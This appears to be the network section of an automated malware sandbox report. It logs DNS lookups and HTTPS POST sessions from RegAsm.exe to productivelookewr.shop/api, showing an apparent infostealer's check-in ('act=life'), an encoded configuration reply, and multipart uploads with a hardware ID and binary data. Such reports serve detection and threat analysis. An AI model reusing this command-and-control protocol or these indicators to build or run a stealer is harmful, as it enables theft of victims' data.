        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Apr 21, 2024 09:04:56.186405897 CEST1.1.1.1192.168.2.40x6dd0No error (0)productivelookewr.shop104.21.11.250A (IP address)IN (0x0001)false
        Apr 21, 2024 09:04:56.186405897 CEST1.1.1.1192.168.2.40x6dd0No error (0)productivelookewr.shop172.67.150.207A (IP address)IN (0x0001)false
        • productivelookewr.shop
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.449742104.21.11.2504435104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        TimestampBytes transferredDirectionData
        2024-04-21 07:04:56 UTC269OUTPOST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: productivelookewr.shop
        2024-04-21 07:04:56 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
        Data Ascii: act=life
        2024-04-21 07:04:56 UTC810INHTTP/1.1 200 OK
        Date: Sun, 21 Apr 2024 07:04:56 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: PHPSESSID=rhjtmhnl94hm02384gc26c6v3k; expires=Thu, 15-Aug-2024 00:51:35 GMT; Max-Age=9999999; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLg%2B6Rqc1GFOhEms5ynnDAnHPi86xtJR0mGN4eWpOPPAC%2F13OfnKFuuf88t3RXVy5UG8tA8W84P%2F8nJC9s%2FyQ6CV%2F1XvEzbMrUwmH5JT5T3U3YaURPyxNe4hfEWoIG%2F5hcKeI0hCd5f4"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 877b85d9df8e5084-ATL
        alt-svc: h3=":443"; ma=86400
        2024-04-21 07:04:56 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
        Data Ascii: 2ok
        2024-04-21 07:04:56 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.449743104.21.11.2504435104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        TimestampBytes transferredDirectionData
        2024-04-21 07:04:57 UTC270OUTPOST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 62
        Host: productivelookewr.shop
        2024-04-21 07:04:57 UTC62OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 77 61 72 65 66 72 6f 6d 77 61 72 65 26 6a 3d 64 65 66 61 75 6c 74
        Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--@warefromware&j=default
        2024-04-21 07:04:57 UTC806INHTTP/1.1 200 OK
        Date: Sun, 21 Apr 2024 07:04:57 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: PHPSESSID=769l6cb88vb9dmdq9lgafe5a4a; expires=Thu, 15-Aug-2024 00:51:36 GMT; Max-Age=9999999; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eT21HwSj0kgLBMDOjVTh2BQIsRXp6DQ%2F6yBpxDq27sFrFy9j5eX%2B69x%2FQxBy0fzy66xo%2BDsds8fg4WsS0Q2p3kduLVxmeUJzRWD6q0Vb085qIcIPSQNbPQcXKANfoqMTYbhoYsm3Ppg"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 877b85dead9a4519-ATL
        alt-svc: h3=":443"; ma=86400
        2024-04-21 07:04:57 UTC563INData Raw: 33 39 65 63 0d 0a 30 7a 41 6b 79 2b 41 4d 62 7a 67 55 6f 30 56 62 79 59 4b 36 34 72 66 4e 6a 74 75 4b 34 38 7a 73 6e 71 6b 52 59 67 38 63 6d 39 47 6f 4f 69 33 70 6c 69 35 56 47 43 43 50 54 31 4c 72 38 64 2f 41 6a 65 33 36 71 66 2b 47 34 4f 61 58 69 33 41 47 4c 53 61 37 74 37 4a 63 56 36 37 4d 42 6d 59 61 65 64 74 6e 59 65 6e 5a 73 4f 76 4d 78 34 66 53 71 49 61 69 7a 71 53 4a 4d 78 56 71 66 76 36 70 70 31 56 4b 75 49 6c 6a 41 58 68 35 78 6a 45 36 70 4f 50 4a 69 5a 6d 6b 34 66 6d 6d 36 63 58 6c 76 4d 78 72 51 44 55 38 75 5a 79 32 52 45 57 47 67 58 38 45 47 6a 69 70 54 46 4c 72 35 38 37 41 6a 65 32 73 68 36 69 54 72 5a 37 2f 78 47 49 2b 4c 53 62 67 6a 66 46 5a 55 4b 36 53 62 52 74 52 65 38 30 32 42 2b 75 34 6a 4e 4b 48 2f 62 37 72 39 38 48 47 35 65 4f 6a 47
        Data Ascii: 39ec0zAky+AMbzgUo0VbyYK64rfNjtuK48zsnqkRYg8cm9GoOi3pli5VGCCPT1Lr8d/Aje36qf+G4OaXi3AGLSa7t7JcV67MBmYaedtnYenZsOvMx4fSqIaizqSJMxVqfv6pp1VKuIljAXh5xjE6pOPJiZmk4fmm6cXlvMxrQDU8uZy2REWGgX8EGjipTFLr587Aje2sh6iTrZ7/xGI+LSbgjfFZUK6SbRtRe802B+u4jNKH/b7r98HG5eOjG
        2024-04-21 07:04:57 UTC1369INData Raw: 68 37 72 77 6d 67 44 57 33 76 42 4e 54 47 67 36 39 32 53 33 71 62 68 74 4f 69 4d 70 49 48 2f 79 33 51 4b 5a 33 48 7a 74 37 78 66 51 4b 6d 43 4c 6b 4d 79 48 61 70 6e 50 72 4f 67 67 4d 4b 56 6a 4f 6d 70 37 34 32 34 7a 4d 61 4c 47 32 74 79 4d 4a 4c 78 38 7a 6f 74 73 4f 6f 46 5a 68 70 78 7a 57 64 68 36 61 44 51 68 64 61 73 35 37 62 72 69 61 57 63 2f 4e 6c 31 44 57 68 73 2f 37 61 2f 57 45 57 37 69 47 41 4c 57 58 2f 4b 4c 6a 79 73 35 4a 6a 4f 76 63 53 48 2b 65 2b 5a 37 74 61 2b 69 31 49 4e 5a 6e 4c 7a 70 4c 45 53 4c 73 4b 64 49 47 55 78 62 36 6c 4d 55 75 76 6e 31 4d 43 4e 37 61 79 39 36 59 57 76 69 76 4c 46 64 77 78 72 63 50 53 38 74 31 68 47 72 6f 68 6d 42 56 74 37 79 69 67 35 72 75 33 63 68 74 6d 75 36 66 6d 6d 36 63 58 6c 76 4d 78 72 51 44 55 38 75 5a 32 32
        Data Ascii: h7rwmgDW3vBNTGg692S3qbhtOiMpIH/y3QKZ3Hzt7xfQKmCLkMyHapnPrOggMKVjOmp7424zMaLG2tyMJLx8zotsOoFZhpxzWdh6aDQhdas57briaWc/Nl1DWhs/7a/WEW7iGALWX/KLjys5JjOvcSH+e+Z7ta+i1INZnLzpLESLsKdIGUxb6lMUuvn1MCN7ay96YWvivLFdwxrcPS8t1hGrohmBVt7yig5ru3chtmu6fmm6cXlvMxrQDU8uZ22
        2024-04-21 07:04:57 UTC1369INData Raw: 4e 38 43 6c 4e 2f 79 79 59 33 70 4f 76 55 68 63 65 6b 34 37 48 6e 67 4b 4f 44 39 38 39 7a 51 43 4d 57 6b 74 6a 78 56 56 37 70 32 69 78 4e 65 33 76 4f 4e 54 71 36 6f 75 32 44 32 36 48 72 72 36 6a 70 78 5a 47 79 6f 78 67 5a 42 52 57 53 38 37 5a 65 42 76 48 41 4c 67 78 57 65 73 41 6f 50 36 48 6f 32 34 48 48 70 75 4f 78 35 34 69 76 6a 66 6a 4b 65 52 4a 2f 66 76 57 68 76 56 68 41 70 6f 39 69 54 52 51 65 71 6b 78 35 72 50 69 59 32 4a 66 76 78 72 72 38 67 71 54 4d 79 63 68 39 44 6d 70 6f 75 64 76 61 54 51 6a 42 36 58 64 6c 4d 52 32 42 49 44 58 72 75 4a 72 41 32 4b 37 6b 76 2f 71 4f 6f 34 33 79 78 58 77 46 59 6e 62 35 73 37 78 58 51 71 4b 4a 62 51 42 65 5a 4d 73 6e 4d 61 37 68 30 6f 71 56 34 59 54 53 67 38 47 70 6c 72 79 54 4d 55 42 63 61 66 4c 78 68 46 46 49 70
        Data Ascii: N8ClN/yyY3pOvUhcek47HngKOD989zQCMWktjxVV7p2ixNe3vONTq6ou2D26Hrr6jpxZGyoxgZBRWS87ZeBvHALgxWesAoP6Ho24HHpuOx54ivjfjKeRJ/fvWhvVhApo9iTRQeqkx5rPiY2Jfvxrr8gqTMych9DmpoudvaTQjB6XdlMR2BIDXruJrA2K7kv/qOo43yxXwFYnb5s7xXQqKJbQBeZMsnMa7h0oqV4YTSg8GplryTMUBcafLxhFFIp
        2024-04-21 07:04:57 UTC1369INData Raw: 66 65 38 59 73 4f 72 6e 79 32 34 54 62 6f 36 7a 33 67 4f 72 46 7a 76 76 54 4d 31 67 76 50 74 79 6b 73 6b 4a 41 71 73 49 47 5a 6b 55 34 71 55 77 67 77 34 75 7a 77 4e 4b 6a 72 4f 47 71 77 61 36 41 38 4d 42 30 43 32 5a 36 2f 62 4f 38 57 55 69 6e 69 32 49 46 56 6e 48 54 4b 6a 79 6a 36 74 47 46 32 61 4c 76 71 2b 75 41 37 73 43 55 6f 42 68 41 61 6d 61 35 36 2f 4d 53 59 5a 71 31 54 55 30 79 48 64 35 70 55 63 44 35 73 4f 75 2b 37 2b 75 31 71 4e 6e 73 7a 76 33 44 64 41 35 70 62 50 65 68 76 31 56 47 72 34 70 6d 43 6c 5a 34 7a 7a 55 78 71 75 44 57 6a 39 32 6d 36 4c 6a 73 68 61 4b 4a 76 49 55 62 61 77 59 2b 2f 71 76 78 43 67 54 70 71 6d 30 58 51 44 54 76 4c 44 6d 73 38 4d 36 62 6c 63 65 48 70 71 62 70 78 5a 65 55 6f 42 68 41 61 6e 4b 35 36 2f 4d 53 51 71 4b 49 5a 77
        Data Ascii: fe8YsOrny24Tbo6z3gOrFzvvTM1gvPtykskJAqsIGZkU4qUwgw4uzwNKjrOGqwa6A8MB0C2Z6/bO8WUini2IFVnHTKjyj6tGF2aLvq+uA7sCUoBhAama56/MSYZq1TU0yHd5pUcD5sOu+7+u1qNnszv3DdA5pbPehv1VGr4pmClZ4zzUxquDWj92m6LjshaKJvIUbawY+/qvxCgTpqm0XQDTvLDms8M6blceHpqbpxZeUoBhAanK56/MSQqKIZw
        2024-04-21 07:04:57 UTC1369INData Raw: 4c 54 43 6f 37 4e 36 42 32 36 2f 69 75 61 6a 50 78 75 57 58 69 33 51 59 4c 53 61 37 38 35 46 5a 55 4c 79 42 66 67 74 64 65 6f 46 50 55 72 53 75 73 4f 76 4d 78 34 66 53 71 49 61 69 7a 71 53 4a 4d 77 35 2f 65 76 69 7a 75 56 74 4b 6f 6f 70 38 43 6c 31 39 7a 79 6b 79 72 2b 7a 52 69 39 79 71 34 4c 6a 6a 69 4b 75 4b 39 73 31 2b 51 43 4d 57 6b 74 6a 78 56 56 37 70 32 69 78 4e 64 6e 58 4f 4c 48 6e 44 69 38 66 4f 76 63 54 31 30 59 50 71 37 6f 6e 77 69 79 74 43 4c 58 6e 78 75 37 39 52 51 4b 4b 4f 59 67 78 54 63 4d 51 76 50 71 54 6e 30 59 66 56 71 66 36 2b 35 59 69 75 68 66 58 42 64 77 46 6d 50 72 66 62 32 6a 6b 47 72 70 6f 75 56 52 67 32 38 79 41 76 75 2b 4f 59 36 4c 36 77 6f 74 4b 41 36 72 66 6d 6c 36 41 7a 42 32 45 2b 6f 66 48 78 58 31 53 6f 68 33 77 4a 56 58 33
        Data Ascii: LTCo7N6B26/iuajPxuWXi3QYLSa785FZULyBfgtdeoFPUrSusOvMx4fSqIaizqSJMw5/evizuVtKoop8Cl19zykyr+zRi9yq4LjjiKuK9s1+QCMWktjxVV7p2ixNdnXOLHnDi8fOvcT10YPq7onwiytCLXnxu79RQKKOYgxTcMQvPqTn0YfVqf6+5YiuhfXBdwFmPrfb2jkGrpouVRg28yAvu+OY6L6wotKA6rfml6AzB2E+ofHxX1Soh3wJVX3
        2024-04-21 07:04:57 UTC1369INData Raw: 4f 50 58 67 39 61 75 35 71 76 36 6a 61 65 47 2b 63 64 34 44 6d 74 73 2f 37 79 34 55 55 57 67 68 57 59 42 55 48 58 47 5a 33 66 44 69 37 50 41 30 72 65 73 34 61 72 42 6a 5a 6e 73 78 6a 4e 6f 42 6d 47 33 32 39 70 4c 4c 73 4c 70 4c 67 70 57 4e 70 6c 6c 65 61 50 74 30 49 72 52 71 4f 47 2b 37 6f 69 38 68 2f 6e 46 63 77 52 6d 63 66 2b 33 73 6c 4a 55 72 34 5a 6d 44 6c 64 37 7a 79 51 39 36 36 36 77 36 37 37 76 36 36 47 6f 32 65 7a 4f 7a 73 5a 39 47 32 4a 35 36 4c 6e 78 4f 69 32 32 7a 41 5a 6d 51 78 36 71 54 48 6d 73 37 4a 6a 59 6c 2b 2f 6f 74 2f 71 4b 72 34 58 33 78 58 51 50 61 48 54 35 76 4c 56 52 53 4b 4b 44 62 51 56 58 65 38 38 74 4d 4b 4c 6e 31 49 54 53 37 36 4c 52 67 2b 72 75 69 65 53 4c 4b 30 49 74 56 64 69 65 6e 56 56 63 36 65 6f 46 45 68 51 65 71 6a 35 52
        Data Ascii: OPXg9au5qv6jaeG+cd4Dmts/7y4UUWghWYBUHXGZ3fDi7PA0res4arBjZnsxjNoBmG329pLLsLpLgpWNplleaPt0IrRqOG+7oi8h/nFcwRmcf+3slJUr4ZmDld7zyQ9666w677v66Go2ezOzsZ9G2J56LnxOi22zAZmQx6qTHms7JjYl+/ot/qKr4X3xXQPaHT5vLVRSKKDbQVXe88tMKLn1ITS76LRg+ruieSLK0ItVdienVVc6eoFEhQeqj5R
        2024-04-21 07:04:57 UTC1369INData Raw: 62 59 76 36 7a 52 67 35 37 67 35 70 66 53 47 32 73 47 50 76 36 2f 38 51 6f 45 36 59 52 6e 43 31 31 77 7a 7a 55 38 72 65 2f 58 69 64 79 72 35 4c 72 6f 68 61 71 4a 2b 63 68 2f 43 32 70 39 39 72 65 34 58 45 2b 6d 77 69 42 6c 4d 52 32 42 49 43 48 72 75 4a 72 41 39 4c 54 76 74 65 58 42 78 75 58 6a 68 52 74 72 64 42 61 53 32 50 46 56 53 75 6e 61 4c 45 31 57 65 4d 51 6e 4d 36 33 6b 33 59 62 66 71 75 79 79 36 34 36 71 69 50 6a 45 63 77 74 6b 66 2f 2b 32 75 31 6c 41 70 49 46 6f 43 78 6f 34 71 55 78 53 36 2b 66 41 77 49 33 74 72 4a 6e 7a 6a 4b 4b 4a 76 4b 4d 59 48 79 4d 57 6b 71 72 5a 4f 53 33 70 68 57 4a 4e 41 6a 53 42 4c 44 57 76 35 39 69 4e 31 71 66 70 76 65 4b 45 72 6f 62 75 77 33 4d 48 66 32 7a 35 75 72 52 65 52 61 6d 47 61 41 52 63 64 63 56 6e 64 38 4f 4c 73
        Data Ascii: bYv6zRg57g5pfSG2sGPv6/8QoE6YRnC11wzzU8re/Xidyr5LrohaqJ+ch/C2p99re4XE+mwiBlMR2BICHruJrA9LTvteXBxuXjhRtrdBaS2PFVSunaLE1WeMQnM63k3Ybfquyy646qiPjEcwtkf/+2u1lApIFoCxo4qUxS6+fAwI3trJnzjKKJvKMYHyMWkqrZOS3phWJNAjSBLDWv59iN1qfpveKErobuw3MHf2z5urReRamGaARcdcVnd8OLs
        2024-04-21 07:04:57 UTC1369INData Raw: 73 34 61 72 42 6d 34 33 79 78 58 51 57 66 44 50 65 76 62 5a 54 55 4c 6d 56 59 55 30 55 48 71 70 4d 65 61 32 67 67 4d 4b 47 34 59 54 53 67 38 47 71 6e 37 79 54 4d 56 41 2f 4a 61 7a 67 35 67 49 55 77 65 6c 78 51 7a 49 64 32 45 39 53 77 4b 44 4f 77 49 33 74 76 76 65 41 36 73 58 4f 37 6f 73 72 51 69 30 35 2b 71 47 6a 56 45 57 2f 67 53 6b 7a 5a 46 48 58 4c 54 36 37 35 38 2b 50 6c 65 47 45 30 6f 50 42 6f 63 36 6b 69 55 70 6f 42 68 57 53 38 37 68 56 58 62 69 55 59 78 31 64 4e 71 6c 4d 55 70 53 75 73 4f 75 2b 37 2f 54 35 73 4d 50 75 75 2f 2f 46 66 51 64 37 62 37 53 55 70 31 68 42 75 59 56 35 41 68 6f 34 71 55 78 53 36 2b 61 59 32 4a 66 38 6f 74 47 44 36 75 36 4b 37 59 73 72 51 6a 30 73 6f 75 62 69 42 52 62 37 36 67 55 53 46 42 36 71 50 6c 48 41 69 35 69 57 6c 66
        Data Ascii: s4arBm43yxXQWfDPevbZTULmVYU0UHqpMea2ggMKG4YTSg8Gqn7yTMVA/Jazg5gIUwelxQzId2E9SwKDOwI3tvveA6sXO7osrQi05+qGjVEW/gSkzZFHXLT6758+PleGE0oPBoc6kiUpoBhWS87hVXbiUYx1dNqlMUpSusOu+7/T5sMPuu//FfQd7b7SUp1hBuYV5Aho4qUxS6+aY2Jf8otGD6u6K7YsrQj0soubiBRb76gUSFB6qPlHAi5iWlf
        2024-04-21 07:04:57 UTC1369INData Raw: 77 61 32 63 37 6f 52 69 46 6d 42 75 2f 76 2b 35 51 30 75 6c 77 69 42 50 47 6a 72 46 4c 44 57 75 35 38 6a 50 78 37 2f 6e 74 66 37 4e 71 70 79 38 68 54 46 41 66 48 58 32 6f 62 39 56 43 62 69 55 59 78 31 5a 63 38 5a 72 4d 62 72 74 31 4d 43 62 37 61 79 73 34 34 32 6f 67 2b 6d 45 59 68 5a 75 61 50 37 2f 75 55 4e 4c 70 63 4a 52 51 7a 49 64 71 6d 63 68 36 37 69 61 77 4f 43 73 34 72 66 76 6c 37 2f 44 33 4d 42 2f 41 32 46 2f 2f 76 50 2f 4f 69 33 43 77 6d 68 4e 41 6a 53 53 61 56 48 41 69 35 69 45 78 4f 2b 30 2b 37 6a 54 39 64 75 76 6e 43 4e 53 42 52 58 6d 2f 64 6b 35 58 38 48 70 42 55 31 4d 4e 70 6c 6c 61 2b 57 49 73 2b 75 56 76 61 7a 68 71 73 48 70 6a 65 37 5a 64 51 4e 37 66 62 36 4e 6a 31 4e 4c 70 73 35 67 42 6c 70 78 30 54 45 69 35 2b 6a 62 6d 73 2b 52 30 70 4c
        Data Ascii: wa2c7oRiFmBu/v+5Q0ulwiBPGjrFLDWu58jPx7/ntf7Nqpy8hTFAfHX2ob9VCbiUYx1Zc8ZrMbrt1MCb7ays442og+mEYhZuaP7/uUNLpcJRQzIdqmch67iawOCs4rfvl7/D3MB/A2F//vP/Oi3CwmhNAjSSaVHAi5iExO+0+7jT9duvnCNSBRXm/dk5X8HpBU1MNplla+WIs+uVvazhqsHpje7ZdQN7fb6Nj1NLps5gBlpx0TEi5+jbms+R0pL


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.449744104.21.11.2504435104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        TimestampBytes transferredDirectionData
        2024-04-21 07:04:57 UTC288OUTPOST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 18171
        Host: productivelookewr.shop
        2024-04-21 07:04:57 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 42 43 31 33 32 30 35 42 36 43 43 38 44 31 32 43 36 32 34 31 34 43 31 42 35 32 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 77 61 72 65
        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"037BC13205B6CC8D12C62414C1B52377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@ware
        2024-04-21 07:04:57 UTC2840OUTData Raw: a1 79 41 bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3
        Data Ascii: yA~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm
        2024-04-21 07:04:58 UTC812INHTTP/1.1 200 OK
        Date: Sun, 21 Apr 2024 07:04:58 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: PHPSESSID=6utmnn0a2llnlv944o9i646ftd; expires=Thu, 15-Aug-2024 00:51:37 GMT; Max-Age=9999999; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CZNHjf6eo947p9W1k%2FvG6sLAv7VM3oRn42l86La%2BfjCuq%2FjvT3FPahxAAotHL%2FLay0mZIfzYElgjYZ%2BA6w11st05TirGWKJ6nHoUH8g%2BTFW5bfP2h2pu5m6EtTn52UCYEA1hR%2Fh0MBXN"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 877b85e2da757bc9-ATL
        alt-svc: h3=":443"; ma=86400
        2024-04-21 07:04:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
        Data Ascii: fok 81.181.57.52
        2024-04-21 07:04:58 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.449745104.21.11.2504435104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        TimestampBytes transferredDirectionData
        2024-04-21 07:04:58 UTC287OUTPOST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8792
        Host: productivelookewr.shop
        2024-04-21 07:04:58 UTC8792OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 42 43 31 33 32 30 35 42 36 43 43 38 44 31 32 43 36 32 34 31 34 43 31 42 35 32 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 77 61 72 65
        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"037BC13205B6CC8D12C62414C1B52377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@ware
        2024-04-21 07:04:59 UTC814INHTTP/1.1 200 OK
        Date: Sun, 21 Apr 2024 07:04:59 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: PHPSESSID=36qnnjg3paors3sl732ois56bu; expires=Thu, 15-Aug-2024 00:51:38 GMT; Max-Age=9999999; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h41IkJSQzC%2BN%2BrgFu9NB%2BLGR6%2FUg5C5HKuWJD4tcNXJgY0U1NwCove47rTz4RJ3u3SQ%2Fx%2BNPP5sIwCJlBR4RPuMj0a2gJj6YY8TGI9QyMqGBmtKuVMX4wMkJ7rU%2FhrQ%2FrnysAkKGNDd4"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 877b85e7da3ab066-ATL
        alt-svc: h3=":443"; ma=86400
        2024-04-21 07:04:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
        Data Ascii: fok 81.181.57.52
        2024-04-21 07:04:59 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        4192.168.2.449746104.21.11.2504435104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        TimestampBytes transferredDirectionData
        2024-04-21 07:04:59 UTC288OUTPOST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 20445
        Host: productivelookewr.shop
        2024-04-21 07:04:59 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 42 43 31 33 32 30 35 42 36 43 43 38 44 31 32 43 36 32 34 31 34 43 31 42 35 32 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 